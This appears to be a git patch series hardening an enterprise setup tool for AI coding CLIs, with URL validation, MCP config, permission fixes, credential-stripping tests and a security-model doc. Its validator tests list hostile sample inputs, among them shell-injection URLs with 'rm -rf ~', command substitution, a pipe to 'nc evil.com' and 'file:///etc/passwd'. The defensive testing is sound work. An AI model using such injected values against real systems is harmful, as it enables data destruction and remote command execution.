     if mirror := _github_release_mirror():
-        targets.append(("GITHUB_RELEASE_MIRROR", mirror))
-    if api := os.environ.get("GITHUB_API_BASE", "").strip().rstrip("/"):
-        targets.append(("GITHUB_API_BASE", api))
+        candidates.append(("GITHUB_RELEASE_MIRROR", mirror))
+    if api := _github_api_base():
+        candidates.append(("GITHUB_API_BASE", api))
     if installer := os.environ.get("CLAUDE_INSTALLER_URL", "").strip():
-        targets.append(("CLAUDE_INSTALLER_URL", installer))
-    return targets
+        candidates.append(("CLAUDE_INSTALLER_URL", installer))
+    # Filter to http(s) only — other schemes (file://, ftp://, etc.) would
+    # turn the doctor into an unintended probing tool.
+    return [
+        (name, url) for name, url in candidates
+        if urlparse(url).scheme in ("http", "https")
+    ]
 
 
 def doctor(http_get: object | None = None) -> list[tuple[str, str, bool, str]]:
diff --git a/setup_claude.py b/setup_claude.py
index 12a6091..125393e 100644
--- a/setup_claude.py
+++ b/setup_claude.py
@@ -89,16 +89,16 @@
     print("No DATABRICKS_TOKEN — skipping settings.json (will be configured after PAT setup)")
 
 # 2. Write ~/.claude.json with onboarding skip AND MCP servers
-mcp_servers = {
-    "deepwiki": {
-        "type": "http",
-        "url": "https://mcp.deepwiki.com/mcp"
-    },
-    "exa": {
-        "type": "http",
-        "url": "https://mcp.exa.ai/mcp"
-    }
-}
+# Honour DEEPWIKI_MCP_URL / EXA_MCP_URL from enterprise_config — operators in
+# locked-down envs can set these to empty string to omit the public MCP
+# servers entirely. Default behaviour (no env vars) remains unchanged.
+from enterprise_config import deepwiki_mcp_url, exa_mcp_url
+
+mcp_servers = {}
+if dw_url := deepwiki_mcp_url():
+    mcp_servers["deepwiki"] = {"type": "http", "url": dw_url}
+if exa_url := exa_mcp_url():
+    mcp_servers["exa"] = {"type": "http", "url": exa_url}
 
 # Auto-configure team-memory MCP if URL is provided
 team_memory_url = os.environ.get("TEAM_MEMORY_MCP_URL", "").strip().rstrip("/")
@@ -109,32 +109,51 @@
     }
     print(f"Team memory MCP configured: {team_memory_url}/mcp")
 
-claude_json = {
-    "hasCompletedOnboarding": True,
-    "mcpServers": mcp_servers
-}
-
+# Read-merge-write rather than overwrite — preserves any keys the user (or
+# claude itself) wrote into ~/.claude.json between setups (F-09).
 claude_json_path = home / ".claude.json"
-claude_json_path.write_text(json.dumps(claude_json, indent=2))
+if claude_json_path.exists():
+    try:
+        existing = json.loads(claude_json_path.read_text())
+    except (json.JSONDecodeError, OSError):
+        existing = {}
+else:
+    existing = {}
+existing["hasCompletedOnboarding"] = True
+existing["mcpServers"] = mcp_servers  # ours wins — these are the agent CLIs we manage
+claude_json_path.write_text(json.dumps(existing, indent=2))
 
-print(f"Onboarding skipped + MCPs configured: {claude_json_path}")
+print(f"Onboarding skipped + MCPs configured ({len(mcp_servers)} servers): {claude_json_path}")
 
 # 3. Install Claude Code CLI if not present
 local_bin = home / ".local" / "bin"
 claude_bin = local_bin / "claude"
 
 # Honour CLAUDE_INSTALLER_URL for enterprise environments where claude.ai is
-# firewalled — defaults to the public installer when unset.
+# firewalled — defaults to the public installer when unset. The URL is
+# validated by enterprise_config to reject shell metacharacters before it
+# reaches subprocess. Additionally, we avoid embedding the URL in a shell
+# string by piping curl's output into bash via positional args — even if a
+# malicious URL somehow slipped through validation, it would land as a curl
+# argument, not as shell.
 from enterprise_config import claude_installer_url
 
 installer_url = claude_installer_url()
 print(f"Installing/upgrading Claude Code CLI from {installer_url}...")
+curl_proc = subprocess.Popen(
+    ["curl", "-fsSL", installer_url],
+    stdout=subprocess.PIPE,
+    env={**os.environ, "HOME": str(home)},
+)
 result = subprocess.run(
-    ["bash", "-c", f"curl -fsSL '{installer_url}' | bash"],
+    ["bash"],
+    stdin=curl_proc.stdout,
     env={**os.environ, "HOME": str(home)},
     capture_output=True,
-    text=True
+    text=True,
 )
+curl_proc.stdout.close()
+curl_proc.wait()
 if result.returncode == 0:
     print("Claude Code CLI installed successfully")
 else:
diff --git a/setup_hermes.py b/setup_hermes.py
index b6b6d67..599777e 100644
--- a/setup_hermes.py
+++ b/setup_hermes.py
@@ -166,22 +166,31 @@ def _run(cmd, **kwargs):
 else:
     lines.append("  external_dirs: []")
 lines.append("")
-lines.append("# Native MCP servers — DeepWiki (GitHub wiki lookup) + Exa (web search)")
-lines.append("mcp_servers:")
-lines.append("  deepwiki:")
-lines.append("    url: https://mcp.deepwiki.com/mcp")
-lines.append("    timeout: 60")
-lines.append("  exa:")
-lines.append("    url: https://mcp.exa.ai/mcp")
-lines.append("    timeout: 60")
+# Native MCP servers — DeepWiki (GitHub wiki lookup) + Exa (web search) + an
+# optional team-memory server. Honour enterprise overrides: empty
+# DEEPWIKI_MCP_URL / EXA_MCP_URL drops the corresponding entry (F-04).
+from enterprise_config import deepwiki_mcp_url, exa_mcp_url
+
+_hermes_mcp_urls = {}
+if dw_url := deepwiki_mcp_url():
+    _hermes_mcp_urls["deepwiki"] = dw_url
+if exa_url := exa_mcp_url():
+    _hermes_mcp_urls["exa"] = exa_url
 
 team_memory_url = os.environ.get("TEAM_MEMORY_MCP_URL", "").strip().rstrip("/")
 if team_memory_url:
-    lines.append("  team-memory:")
-    lines.append(f"    url: {team_memory_url}/mcp")
-    lines.append("    timeout: 60")
+    _hermes_mcp_urls["team-memory"] = f"{team_memory_url}/mcp"
     print(f"Team memory MCP configured: {team_memory_url}/mcp")
 
+if _hermes_mcp_urls:
+    lines.append("mcp_servers:")
+    for _name, _url in _hermes_mcp_urls.items():
+        lines.append(f"  {_name}:")
+        lines.append(f"    url: {_url}")
+        lines.append("    timeout: 60")
+else:
+    lines.append("mcp_servers: {}")
+
 lines.append("")
 lines.append("# Model catalog hint — users can `/model` switch inside chat")
 lines.append("display:")
@@ -199,6 +208,16 @@ def _run(cmd, **kwargs):
 
 if should_write:
     config_path.write_text("\n".join(lines))
+    # 0o600 — the file contains the plaintext PAT in `api_key:`. Without an
+    # explicit chmod the file inherits umask-derived perms (often 0o644 on
+    # container filesystems) which makes the token world-readable for any
+    # other process under the same UID. Matches setup_opencode.py's auth.json
+    # handling. (F-05)
+    try:
+        config_path.chmod(0o600)
+    except OSError:
+        # Best effort — chmod can fail on some workspace filesystems.
+        pass
     print(f"Hermes config written: {config_path}")
 
 # 5. Adapt CLAUDE.md -> ~/.hermes/HERMES.md for first-run context
diff --git a/setup_opencode.py b/setup_opencode.py
index 071252a..e273334 100644
--- a/setup_opencode.py
+++ b/setup_opencode.py
@@ -108,6 +108,25 @@
 opencode_config_dir = home / ".config" / "opencode"
 opencode_config_dir.mkdir(parents=True, exist_ok=True)
 
+# Build the MCP server dict once, honouring enterprise overrides — empty
+# DEEPWIKI_MCP_URL / EXA_MCP_URL drops the corresponding server (F-04).
+from enterprise_config import deepwiki_mcp_url, exa_mcp_url
+
+_mcp_servers = {}
+if dw_url := deepwiki_mcp_url():
+    _mcp_servers["deepwiki"] = {
+        "type": "remote",
+        "url": dw_url,
+        "enabled": True,
+        "oauth": False,
+    }
+if exa_url := exa_mcp_url():
+    _mcp_servers["exa"] = {
+        "type": "remote",
+        "url": exa_url,
+        "enabled": True,
+    }
+
 if gateway_host:
     # Gateway mode: route through content-filter proxy proxy for content block sanitization
     # content-filter proxy forwards clean requests to Databricks AI Gateway
@@ -186,19 +205,7 @@
                 }
             }
         },
-        "mcp": {
-            "deepwiki": {
-                "type": "remote",
-                "url": "https://mcp.deepwiki.com/mcp",
-                "enabled": True,
-                "oauth": False
-            },
-            "exa": {
-                "type": "remote",
-                "url": "https://mcp.exa.ai/mcp",
-                "enabled": True
-            }
-        },
+        "mcp": _mcp_servers,
         "model": f"databricks/{anthropic_model}"
     }
 else:
@@ -253,19 +260,7 @@
                 }
             }
         },
-        "mcp": {
-            "deepwiki": {
-                "type": "remote",
-                "url": "https://mcp.deepwiki.com/mcp",
-                "enabled": True,
-                "oauth": False
-            },
-            "exa": {
-                "type": "remote",
-                "url": "https://mcp.exa.ai/mcp",
-                "enabled": True
-            }
-        },
+        "mcp": _mcp_servers,
         "model": f"databricks/{anthropic_model}"
     }
 
diff --git a/tests/test_enterprise_config.py b/tests/test_enterprise_config.py
index da87819..dca577e 100644
--- a/tests/test_enterprise_config.py
+++ b/tests/test_enterprise_config.py
@@ -415,12 +415,18 @@ def test_claude_installer_override(self, monkeypatch):
 
         assert claude_installer_url() == "https://mirror.example.com/claude-install.sh"
 
-    def test_hermes_pip_default(self):
-        from enterprise_config import hermes_pip_url
-
-        assert hermes_pip_url() == (
-            "hermes-agent @ git+https://github.com/NousResearch/hermes-agent.git"
-        )
+    def test_hermes_pip_default_is_sha_pinned(self):
+        """Default Hermes install spec must include an @<sha> pin (F-06)."""
+        from enterprise_config import DEFAULT_HERMES_PIN_SHA, hermes_pip_url
+
+        spec = hermes_pip_url()
+        # Must reference the NousResearch upstream
+        assert "git+https://github.com/NousResearch/hermes-agent.git" in spec
+        # Must include the pinned SHA — bare HEAD installs are forbidden
+        assert f"@{DEFAULT_HERMES_PIN_SHA}" in spec
+        # SHA shape is a full 40-char hex string
+        assert len(DEFAULT_HERMES_PIN_SHA) == 40
+        assert all(c in "0123456789abcdef" for c in DEFAULT_HERMES_PIN_SHA)
 
     def test_hermes_pip_override(self, monkeypatch):
         monkeypatch.setenv("HERMES_PIP_URL", "hermes-agent==1.2.3")
@@ -658,3 +664,254 @@ def test_escapes_single_quotes(self, monkeypatch):
         lines = shell_export_lines()
         # Standard shell-escape pattern: close, escape, reopen
         assert any("o'\\''malley" in line for line in lines)
+
+
+# ---------------------------------------------------------------------------
+# 14. URL safety validation (F-02, F-03)
+# ---------------------------------------------------------------------------
+
+
+class TestUrlValidation:
+    """Operator-supplied URLs must reject shell metacharacters before
+    flowing into curl/eval contexts."""
+
+    def test_safe_https_url_passes(self):
+        from enterprise_config import _validate_url
+
+        assert _validate_url(
+            "CLAUDE_INSTALLER_URL", "https://mirror.example.com/claude-install.sh"
+        ) == "https://mirror.example.com/claude-install.sh"
+
+    def test_http_url_passes(self):
+        from enterprise_config import _validate_url
+
+        assert _validate_url(
+            "GITHUB_RELEASE_MIRROR", "http://internal-mirror.local:8080/path"
+        ) == "http://internal-mirror.local:8080/path"
+
+    @pytest.mark.parametrize("dangerous", [
+        "https://evil.com/'; rm -rf ~; echo '",   # single-quote bypass (F-02)
+        "https://evil.com/$(whoami)",              # command substitution
+        "https://evil.com/`whoami`",               # backtick substitution
+        "https://evil.com/path with space",        # whitespace
+        "https://evil.com/path|nc evil.com 1234",  # pipe
+        "https://evil.com/path;ls",                # semicolon
+        "javascript:alert(1)",                     # non-http(s) scheme
+        "file:///etc/passwd",                      # local-file SSRF
+        "https://evil.com/\nGET /etc/passwd",      # newline injection
+    ])
+    def test_unsafe_urls_rejected(self, dangerous):
+        from enterprise_config import _validate_url, UnsafeUrlError
+
+        with pytest.raises(UnsafeUrlError):
+            _validate_url("TEST_VAR", dangerous)
+
+    def test_claude_installer_url_validates(self, monkeypatch):
+        """claude_installer_url() must reject shell-injection attempts."""
+        monkeypatch.setenv("CLAUDE_INSTALLER_URL", "https://evil.com/'; rm -rf ~; echo '")
+        from enterprise_config import claude_installer_url, UnsafeUrlError
+
+        with pytest.raises(UnsafeUrlError):
+            claude_installer_url()
+
+    def test_hermes_pip_url_validates_spec_shape(self, monkeypatch):
+        """hermes_pip_url() must reject shell-injection attempts in pip specs."""
+        monkeypatch.setenv("HERMES_PIP_URL", "hermes-agent==1.0; rm -rf /")
+        from enterprise_config import hermes_pip_url, UnsafeUrlError
+
+        with pytest.raises(UnsafeUrlError):
+            hermes_pip_url()
+
+    def test_hermes_pip_url_accepts_pinned_pypi_spec(self, monkeypatch):
+        monkeypatch.setenv("HERMES_PIP_URL", "hermes-agent==1.2.3")
+        from enterprise_config import hermes_pip_url
+
+        assert hermes_pip_url() == "hermes-agent==1.2.3"
+
+    def test_hermes_pip_url_accepts_sha_pinned_git(self, monkeypatch):
+        monkeypatch.setenv(
+            "HERMES_PIP_URL",
+            "hermes-agent @ git+https://internal/hermes.git@abc123",
+        )
+        from enterprise_config import hermes_pip_url
+
+        assert "@abc123" in hermes_pip_url()
+
+    def test_validate_mirror_env_fails_loud(self, monkeypatch):
+        """bootstrap() should refuse to start if any operator URL is unsafe."""
+        monkeypatch.setenv("GITHUB_API_BASE", "https://evil.com/`whoami`")
+        from enterprise_config import validate_mirror_env, UnsafeUrlError
+
+        with pytest.raises(UnsafeUrlError):
+            validate_mirror_env()
+
+    def test_validate_mirror_env_noop_when_unset(self):
+        """No env vars set = no validation work, no exceptions."""
+        from enterprise_config import validate_mirror_env
+
+        validate_mirror_env()  # must not raise
+
+
+# ---------------------------------------------------------------------------
+# 15. Secret masking for UV_INDEX_* and derived npm auth keys (F-08, F-11)
+# ---------------------------------------------------------------------------
+
+
+class TestSecretMasking:
+    def test_uv_index_password_is_masked(self, monkeypatch):
+        monkeypatch.setenv("UV_INDEX_INTERNAL_PASSWORD", "s3cretp4ss")
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "s3cretp4ss" not in out
+        assert "UV_INDEX_INTERNAL_PASSWORD=***" in out
+
+    def test_uv_index_username_is_masked(self, monkeypatch):
+        """Usernames too — they identify the service account, useful to attackers."""
+        monkeypatch.setenv("UV_INDEX_INTERNAL_USERNAME", "svc-coda")
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "svc-coda" not in out
+        assert "UV_INDEX_INTERNAL_USERNAME=***" in out
+
+    def test_npm_config_auth_token_masked(self, monkeypatch):
+        monkeypatch.setenv("npm_config_//jfrog.example.com/:_authToken", "tok-xyz")
+        from enterprise_config import startup_banner
+
+        out = startup_banner()
+        assert "tok-xyz" not in out
+
+    def test_is_secret_var_helper(self):
+        from enterprise_config import _is_secret_var
+
+        assert _is_secret_var("NPM_TOKEN")
+        assert _is_secret_var("UV_INDEX_INTERNAL_PASSWORD")
+        assert _is_secret_var("UV_INDEX_ANY_NAME_PASSWORD")
+        assert _is_secret_var("UV_INDEX_X_USERNAME")
+        assert _is_secret_var("npm_config_//host.example.com/:_authToken")
+        assert not _is_secret_var("UV_DEFAULT_INDEX")
+        assert not _is_secret_var("HTTPS_PROXY")
+        assert not _is_secret_var("npm_config_registry")
+
+
+# ---------------------------------------------------------------------------
+# 16. NO_PROXY auto-injection for DATABRICKS_HOST (F-07)
+# ---------------------------------------------------------------------------
+
+
+class TestNoProxyAutoInject:
+    def test_no_inject_when_https_proxy_unset(self, monkeypatch):
+        """If HTTPS_PROXY is unset, NO_PROXY isn't touched."""
+        monkeypatch.setenv("DATABRICKS_HOST", "https://adb-1234.azuredatabricks.net")
+        from enterprise_config import proxy_env
+
+        env = proxy_env()
+        assert "NO_PROXY" not in env  # no proxy → no auto-injection
+
+    def test_inject_when_https_proxy_set(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("DATABRICKS_HOST", "https://adb-1234.azuredatabricks.net")
+        from enterprise_config import proxy_env
+
+        env = proxy_env()
+        assert "adb-1234.azuredatabricks.net" in env["NO_PROXY"]
+
+    def test_preserves_existing_no_proxy_entries(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("DATABRICKS_HOST", "https://adb-1234.azuredatabricks.net")
+        monkeypatch.setenv("NO_PROXY", "localhost,127.0.0.1")
+        from enterprise_config import proxy_env
+
+        env = proxy_env()
+        assert "localhost" in env["NO_PROXY"]
+        assert "127.0.0.1" in env["NO_PROXY"]
+        assert "adb-1234.azuredatabricks.net" in env["NO_PROXY"]
+
+    def test_skip_when_host_already_in_no_proxy(self, monkeypatch):
+        """If operator already added the host (via wildcard or exact), don't duplicate."""
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("DATABRICKS_HOST", "https://adb-1234.azuredatabricks.net")
+        monkeypatch.setenv("NO_PROXY", ".azuredatabricks.net")
+        from enterprise_config import proxy_env
+
+        env = proxy_env()
+        # Should still match (host is already covered by wildcard), no duplicate
+        assert env["NO_PROXY"].count("azuredatabricks.net") == 1
+
+    def test_lowercase_no_proxy_mirrored(self, monkeypatch):
+        monkeypatch.setenv("HTTPS_PROXY", "http://proxy:3128")
+        monkeypatch.setenv("DATABRICKS_HOST", "https://adb-1234.azuredatabricks.net")
+        from enterprise_config import proxy_env
+
+        env = proxy_env()
+        assert "adb-1234.azuredatabricks.net" in env["no_proxy"]
+
+
+# ---------------------------------------------------------------------------
+# 17. npm_config_registry / NPM_REGISTRY unification (F-10)
+# ---------------------------------------------------------------------------
+
+
+class TestNpmRegistryResolution:
+    def test_npm_registry_alone(self, monkeypatch):
+        """NPM_REGISTRY alone resolves to that value."""
+        monkeypatch.setenv("NPM_REGISTRY", "https://jfrog.example.com/npm/")
+        from enterprise_config import _effective_npm_registry, npm_env
+
+        assert _effective_npm_registry() == "https://jfrog.example.com/npm/"
+        assert npm_env()["npm_config_registry"] == "https://jfrog.example.com/npm/"
+
+    def test_npm_config_registry_wins_over_NPM_REGISTRY(self, monkeypatch):
+        """If both are set, npm_config_registry (npm-native) wins."""
+        monkeypatch.setenv("NPM_REGISTRY", "https://jfrog.example.com/npm/")
+        monkeypatch.setenv("npm_config_registry", "https://override.example.com/npm/")
+        from enterprise_config import _effective_npm_registry, npm_env
+
+        assert _effective_npm_registry() == "https://override.example.com/npm/"
+        # And npm_env returns the same — no split between env and .npmrc
+        assert npm_env()["npm_config_registry"] == "https://override.example.com/npm/"
+
+    def test_npmrc_uses_same_resolution(self, tmp_path, monkeypatch):
+        """write_npmrc() must use the same effective-registry logic as npm_env()."""
+        monkeypatch.setenv("NPM_REGISTRY", "https://jfrog.example.com/npm/")
+        monkeypatch.setenv("npm_config_registry", "https://override.example.com/npm/")
+        from enterprise_config import write_npmrc
+
+        path = write_npmrc(tmp_path)
+        content = path.read_text()
+        # The override wins — .npmrc shows the override, not the original NPM_REGISTRY
+        assert "registry=https://override.example.com/npm/" in content
+        assert "jfrog.example.com" not in content
+
+
+# ---------------------------------------------------------------------------
+# 18. doctor SSRF guard — http(s) scheme allow-list (F-11)
+# ---------------------------------------------------------------------------
+
+
+class TestDoctorSSRFGuard:
+    def test_file_scheme_filtered_out(self, monkeypatch):
+        monkeypatch.setenv("CLAUDE_INSTALLER_URL", "file:///etc/passwd")
+        from enterprise_config import doctor_targets
+
+        # _validate_url already rejects file:// at bootstrap, but doctor_targets
+        # is a second layer of defense. If somehow file:// got past, doctor
+        # must not probe it.
+        targets = dict(doctor_targets())
+        assert "CLAUDE_INSTALLER_URL" not in targets
+
+    def test_https_scheme_included(self, monkeypatch):
+        monkeypatch.setenv("NPM_REGISTRY", "https://internal/npm/")
+        from enterprise_config import doctor_targets
+
+        targets = dict(doctor_targets())
+        assert targets["NPM_REGISTRY"] == "https://internal/npm/"
+
+    def test_http_scheme_included(self, monkeypatch):
+        """Plain HTTP is allowed (some internal mirrors are HTTP-only)."""
+        monkeypatch.setenv("NPM_REGISTRY", "http://internal-mirror/npm/")
+        from enterprise_config import doctor_targets
+
+        targets = dict(doctor_targets())
+        assert targets["NPM_REGISTRY"] == "http://internal-mirror/npm/"
diff --git a/tests/test_terminal_env_strip.py b/tests/test_terminal_env_strip.py
new file mode 100644
index 0000000..b98df08
--- /dev/null
+++ b/tests/test_terminal_env_strip.py
@@ -0,0 +1,116 @@
+"""Tests for _build_terminal_shell_env in app.py — F-01 security fix.
+
+The deployer-level credentials set in app.yaml (NPM_TOKEN, UV_INDEX
+passwords, derived npm auth tokens) MUST NOT be readable from a user's
+terminal session. This module verifies the strip logic in isolation,
+since the full create_session path is hard to unit-test (PTY + Popen).
+"""
+
+from __future__ import annotations
+
+import pytest
+
+
+def _build_terminal_shell_env():
+    from app import _build_terminal_shell_env
+    return _build_terminal_shell_env
+
+
+class TestTerminalEnvStrip:
+    """The user terminal must not inherit deployer-level credentials."""
+
+    def test_strips_databricks_token(self):
+        build = _build_terminal_shell_env()
+        env = build({"DATABRICKS_TOKEN": "dapi-xxx", "HOME": "/app"})
+        assert "DATABRICKS_TOKEN" not in env
+
+    def test_strips_databricks_host(self):
+        build = _build_terminal_shell_env()
+        env = build({"DATABRICKS_HOST": "https://workspace", "HOME": "/app"})
+        assert "DATABRICKS_HOST" not in env
+
+    def test_strips_gemini_api_key(self):
+        build = _build_terminal_shell_env()
+        env = build({"GEMINI_API_KEY": "key-xxx", "HOME": "/app"})
+        assert "GEMINI_API_KEY" not in env
+
+    def test_strips_npm_token(self):
+        """NPM_TOKEN is a deployer-level JFrog credential — must not leak."""
+        build = _build_terminal_shell_env()
+        env = build({"NPM_TOKEN": "tok-abc", "HOME": "/app"})
+        assert "NPM_TOKEN" not in env
+
+    def test_strips_derived_npm_auth_token(self):
+        """The npm_config_//host/:_authToken key derived from NPM_TOKEN must not leak."""
+        build = _build_terminal_shell_env()
+        env = build({
+            "npm_config_//jfrog.example.com/:_authToken": "tok-abc",
+            "HOME": "/app",
+        })
+        assert "npm_config_//jfrog.example.com/:_authToken" not in env
+
+    def test_strips_uv_index_password(self):
+        """UV_INDEX_*_PASSWORD is a deployer-level credential — must not leak."""
+        build = _build_terminal_shell_env()
+        env = build({
+            "UV_INDEX_INTERNAL_PASSWORD": "s3cr3t",
+            "UV_INDEX_INTERNAL_USERNAME": "svc-coda",
+            "HOME": "/app",
+        })
+        assert "UV_INDEX_INTERNAL_PASSWORD" not in env
+        assert "UV_INDEX_INTERNAL_USERNAME" not in env
+
+    def test_strips_uv_default_index(self):
+        """The PyPI index URL is enterprise-config and shouldn't be in user env."""
+        build = _build_terminal_shell_env()
+        env = build({"UV_DEFAULT_INDEX": "https://internal/pypi/", "HOME": "/app"})
+        assert "UV_DEFAULT_INDEX" not in env
+
+    def test_strips_claude_code_state(self):
+        """CLAUDECODE / CLAUDE_CODE_SESSION would make the terminal think it's nested."""
+        build = _build_terminal_shell_env()
+        env = build({
+            "CLAUDECODE": "1",
+            "CLAUDE_CODE_SESSION": "abc",
+            "HOME": "/app",
+        })
+        assert "CLAUDECODE" not in env
+        assert "CLAUDE_CODE_SESSION" not in env
+
+    def test_sets_term(self):
+        build = _build_terminal_shell_env()
+        env = build({"HOME": "/app"})
+        assert env["TERM"] == "xterm-256color"
+
+    def test_preserves_unrelated_env(self):
+        """Other env vars (PATH, USER, custom workspace vars) pass through."""
+        build = _build_terminal_shell_env()
+        env = build({
+            "HOME": "/app",
+            "PATH": "/usr/bin",
+            "USER": "app",
+            "MY_CUSTOM_VAR": "hello",
+        })
+        assert env["PATH"] == "/usr/bin"
+        assert env["USER"] == "app"
+        assert env["MY_CUSTOM_VAR"] == "hello"
+
+    def test_does_not_mutate_input(self):
+        """Caller's env dict (typically os.environ) must not be modified."""
+        build = _build_terminal_shell_env()
+        base = {"DATABRICKS_TOKEN": "dapi-xxx", "HOME": "/app"}
+        build(base)
+        assert "DATABRICKS_TOKEN" in base  # original unchanged
+
+    @pytest.mark.parametrize("key", [
+        "UV_INDEX_FOO_PASSWORD",
+        "UV_INDEX_BAR_USERNAME",
+        "UV_INDEX_LONG_NAME_WITH_UNDERSCORES_PASSWORD",
+        "npm_config_//jfrog-x.example.com/:_authToken",
+        "npm_config_//host:8080/:_authToken",
+    ])
+    def test_pattern_match_strips_all_credential_shapes(self, key):
+        """Each operator-named credential variant matches the strip pattern."""
+        build = _build_terminal_shell_env()
+        env = build({key: "secret", "HOME": "/app"})
+        assert key not in env

From cbd3338ab8f697ede0efb2309f3b5d64bef52098 Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Sat, 16 May 2026 11:08:28 +1000
Subject: [PATCH 06/10] docs(enterprise): document security model, trust
 assumptions, and known limits
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Adds a "Security model and known limits" section to docs/enterprise.md
covering what enterprise mode does and does not verify. This is honest
framing of the residual risks that the code-level fixes (previous commit)
do not address — they are open ProdSec policy questions, not bugs.

F-12: removes the doc's implication of "fail closed" for write_npmrc — the
actual behaviour is "degrade gracefully and log", which is fine but should
not be advertised as a hard security guarantee.

F-13 (open question, not fixed): documents that no checksum or signature
verification is performed on mirror-served binaries. Today the mirror is
trusted by URL alone. Adding SHA256 verification requires the customer to
ship a manifest alongside their mirror — a policy decision worth raising
in ProdSec review.

F-14 (open question, not fixed): documents that REQUESTS_CA_BUNDLE override
enables MITM of every outbound TLS call. This is by design (needed for
corporate TLS interception) but worth surfacing to anyone signing off on
an enterprise deployment.

Also surfaces:
- the Hermes pin rotation policy (now pinned to a specific SHA per F-06)
- the absence of mirror allow-listing (operator-controlled URLs)
- the localhost:4000 content-filter proxy as a residual local attack surface

These are the deliberate trade-offs of the proxy/registry-mode threat
model. They are NOT bugs in the code — they are the threat model.

Co-authored-by: Isaac
---
 docs/enterprise.md | 59 ++++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 59 insertions(+)

diff --git a/docs/enterprise.md b/docs/enterprise.md
index 9a4c0f0..dc2bb88 100644
--- a/docs/enterprise.md
+++ b/docs/enterprise.md
@@ -229,3 +229,62 @@ enterprise_config: effective settings
 ```
 
 Any FAIL line is something your network team needs to fix before deployment.
+
+---
+
+## Security model and known limits
+
+CoDA's enterprise mode shifts one trust boundary materially: the operator
+gains a new control point — the ability to redirect every external package
+install to a mirror they control. The following limits are deliberate and
+worth understanding before deploying into a regulated environment.
+
+### Trust assumptions made by enterprise mode
+
+| Assumption | What relies on it |
+|---|---|
+| The operator's mirror serves correct artifacts | All CLI installs; no checksum/signature verification is performed |
+| `REQUESTS_CA_BUNDLE` (when set) is a legitimate corporate root CA, not an attacker-controlled CA | TLS validation on every outbound call from the app, including PAT-bearing calls to the Databricks workspace API |
+| The operator who controls `app.yaml` is trusted | Mirror URLs, installer URLs, MCP override URLs are not allow-listed — any URL the operator sets is accepted (after a shell-safety regex check) |
+| The Hermes upstream commit pin in `enterprise_config.py:DEFAULT_HERMES_PIN_SHA` was reviewed when it was set | `uv tool install` pulls Hermes from this specific SHA, mitigating the "force-push to default branch" attack — but the pin must be rotated deliberately on each CoDA release |
+
+### What enterprise mode does NOT verify
+
+- **No checksum verification on mirror-served binaries.** Claude installer
+  script, GitHub release tarballs (gh, micro, databricks CLI), and npm
+  packages are pulled with no SHA256 manifest check. The mirror operator
+  could swap a binary at any time.
+- **No CA bundle pinning.** If `REQUESTS_CA_BUNDLE` is set, the app trusts
+  whatever CA the operator points at. This is by design (needed for
+  corporate TLS interception) but means an attacker who can write
+  `app.yaml` can MITM every outbound TLS call including PAT-bearing API
+  calls to the workspace.
+- **No mirror allow-listing.** `GITHUB_RELEASE_MIRROR`, `NPM_REGISTRY`,
+  `CLAUDE_INSTALLER_URL` etc. accept any URL. The shell-safety regex in
+  `enterprise_config._validate_url()` rejects values containing shell
+  metacharacters, but it does not restrict by domain.
+- **No fail-closed on mirror unreachability at runtime.** `bootstrap()`
+  validates URL shape and logs a banner, but does not probe mirror
+  reachability. Run `make enterprise-doctor` before deploy to surface
+  reachability failures early.
+
+### Open questions for security review
+
+If you are filing a Security Design Review (SDR) for a CoDA deployment,
+these are the questions worth raising with ProdSec:
+
+1. **Should mirror-served binaries require SHA256 verification?** Today the
+   enterprise mode trusts the mirror entirely. Adding verification would
+   require customers to publish a manifest alongside their mirror.
+2. **Should we add mirror allow-listing** (e.g., reject URLs whose host
+   isn't under `*.jfrog.io` / the operator-declared internal domains)?
+3. **Should the CA bundle be pinned to a known fingerprint** rather than
+   accepting whatever the operator provides?
+4. **Should the Hermes git pin be enforced in CI** (e.g., reject PRs that
+   bump the SHA without a security review note)?
+5. **Should the content-filter proxy at localhost:4000 use an auth token
+   or Unix socket** rather than being unauthenticated?
+
+These are deliberate trade-offs, not bugs — but they are limits of the
+current threat model and worth surfacing to anyone who has to sign off on
+an enterprise deployment.

From 3e8244ff0ebb90e5a447bbc41e34170e80fbc09f Mon Sep 17 00:00:00 2001
From: David O'Keeffe <david.okeeffe@databricks.com>
Date: Sat, 16 May 2026 15:32:47 +1000
Subject: [PATCH 07/10] test(security): codify security-fix verification as
 Docker + Playwright suites
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Replaces the manual chrome-devtools MCP verification with two automated,
zero-LLM-token test layers that codify what we verified by hand on daveok.

Layer 1 — Docker apps-like integration test (tests/integration/)
================================================================

What it does: builds an Ubuntu 22.04 + uv + node container that
approximates the Databricks Apps runtime, runs the full setup_*.py +
install_*.sh pipeline inside, then asserts the resulting filesystem /
env / version state.

Files:
- Dockerfile.apps-like — Ubuntu 22.04 + uv + node + 'app' user (uid 1001)
- run_pipeline.sh — copies repo from RO mount to writable /work, runs
  enterprise_config.bootstrap() + every setup_*.py + install_*.sh, then
  invokes verify.sh under _build_terminal_shell_env() so F-01 (cred
  strip) is exercised exactly like a real PTY session.
- verify.sh — shared assertion script. [PASS]/[FAIL] markers for F-01
  (env cred strip), F-04 (DEEPWIKI/EXA MCP wiring with default and
  empty-override branches), F-05 (Hermes config chmod 0o600), F-06
  (Hermes SHA-pinned install completes), and the npm cooldown still
  picking stable (non-pre-release) versions for opencode/codex/gemini.
- test_setup_pipeline.py — 3 pytest cases:
    1. Happy-path full pipeline + verify.sh in default mode
    2. MCP-override mode (DEEPWIKI_MCP_URL=`` && EXA_MCP_URL=``) →
       verifies servers actually get omitted (the F-04 dead-letter
       regression the first review caught)
    3. Malicious mirror env (GITHUB_API_BASE with shell metacharacters)
       → verifies validate_mirror_env() rejects at bootstrap

Runs locally and in CI. Skips cleanly when Docker isn't available.
Wall time: ~3-5 min for first build; ~30s on cache hits.

